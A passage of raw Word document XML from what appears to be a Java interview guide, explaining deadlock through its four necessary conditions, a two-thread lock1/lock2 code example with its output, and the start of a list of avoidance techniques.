    </w:p>
    <w:p w14:paraId="5C6A3FE5" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Understanding the thread life cycle is important for efficient multithreading, as it helps in managing and debugging threads effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C954281" w14:textId="4D1C2170" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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2B7B80A">
          <v:rect id="_x0000_i1815" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD82C63" w14:textId="77777777" w:rsidR="00A02CC7" w:rsidRPr="00CE4B95" w:rsidRDefault="00A02CC7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_Toc196307740"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a deadlock? Explain with an example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
    </w:p>
    <w:p w14:paraId="171D3778" w14:textId="11D0D9D3" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java (or in computer systems in general) refers to a situation in multithreading where two or more threads are blocked forever, waiting for each other to release resources. It happens when two or more threads are stuck in a cycle of dependency on each other, and none of the threads can proceed because they are each waiting for a resource held by the other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5B66E"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In simple terms, a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when two or more threads try to acquire locks on resources in an inconsistent or cyclic manner, leading to a state where none of them can proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459490DF" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conditions for Deadlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F869EF7"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A deadlock situation arises when all the following four conditions are true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D4F69" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mutual Exclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: At least one resource is held in a non-shareable mode, meaning only one thread can use the resource at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C355A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hold and Wait</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread holding at least one resource is waiting for additional resources that are being held by other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D079F1A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No Preemption</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resources cannot be forcibly taken from threads. A thread must release its held resources voluntarily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F8761" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Circular Wait</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A set of threads are waiting for each other in a circular chain. For example, thread A waits for thread B to release a resource, thread B waits for thread C, and thread C waits for thread A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A97366" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Deadlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCDDC1"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Consider the following example where two threads, Thread 1 and Thread 2, each have a lock on a resource and are waiting for each other to release the lock. This results in a deadlock situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C941CD1" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19224064"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public class DeadlockExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CF439"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56021BE0"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private static final Object lock1 = new Object();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4532B"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private static final Object lock2 = new Object();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D275697" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09319AA7"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06AA32"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 Thread 1 trying to lock lock1 and then lock2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC1C7A"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Thread thread1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D45C4"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synchronized (lock1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A5B0D"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System.out.println("Thread 1: Holding lock1...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3DC50"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try { Thread.sleep(100); } catch (InterruptedException e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7B3B0"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System.out.println("Thread 1: Waiting for lock2...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7563D8"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synchronized (lock2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44842784"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    System.out.println("Thread 1: Acquired lock2!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CECC8D3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E10046"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD44B0E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075038D2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA096E0"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 Thread 2 trying to lock lock2 and then lock1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8C6E6"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Thread thread2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13832FE3"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synchronized (lock2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0D223"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System.out.println("Thread 2: Holding lock2...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A44CF"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try { Thread.sleep(100); } catch (InterruptedException e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE869A"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System.out.println("Thread 2: Waiting for lock1...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E8DC7"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synchronized (lock1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161B7E1"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System.out.println("Thread 2: Acquired lock1!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7E924"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217B89D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0312164C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE26BB" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3650B036"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thread1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084D95D"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thread2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393A525"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233468C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242634FD" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB965D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread 1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquires lock1 and then waits for lock2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554606C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread 2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquires lock2 and then waits for lock1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71040BFD"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Now, Thread 1 holds lock1 and waits for lock2, and at the same time, Thread 2 holds lock2 and waits for lock1. Both threads are stuck, each waiting for the other to release a lock. As a result, neither thread can proceed, leading to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434CD34F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Output of the Above Program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755354D7"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Thread 1: Holding lock1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA9F77"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Thread 2: Holding lock2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4464F"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Thread 1: Waiting for lock2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A39BC"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Thread 2: Waiting for lock1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5D703"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The program will hang here indefinitely because Thread 1 is waiting for lock2 and Thread 2 is waiting for lock1. Neither will release the locks they hold, resulting in a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D64F48" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How to Avoid Deadlock?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC31AE"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Here are some ways to prevent or avoid deadlocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FAC6B7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lock Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that all threads acquire the locks in the same order. For example, always acquire lock1 first, then lock2, for all threads, to avoid circular waits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6208A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Timeouts</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set timeouts when trying to acquire locks. If a thread can't acquire the necessary locks within a specified time, it releases all the locks it holds and tries again, avoiding deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B219B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
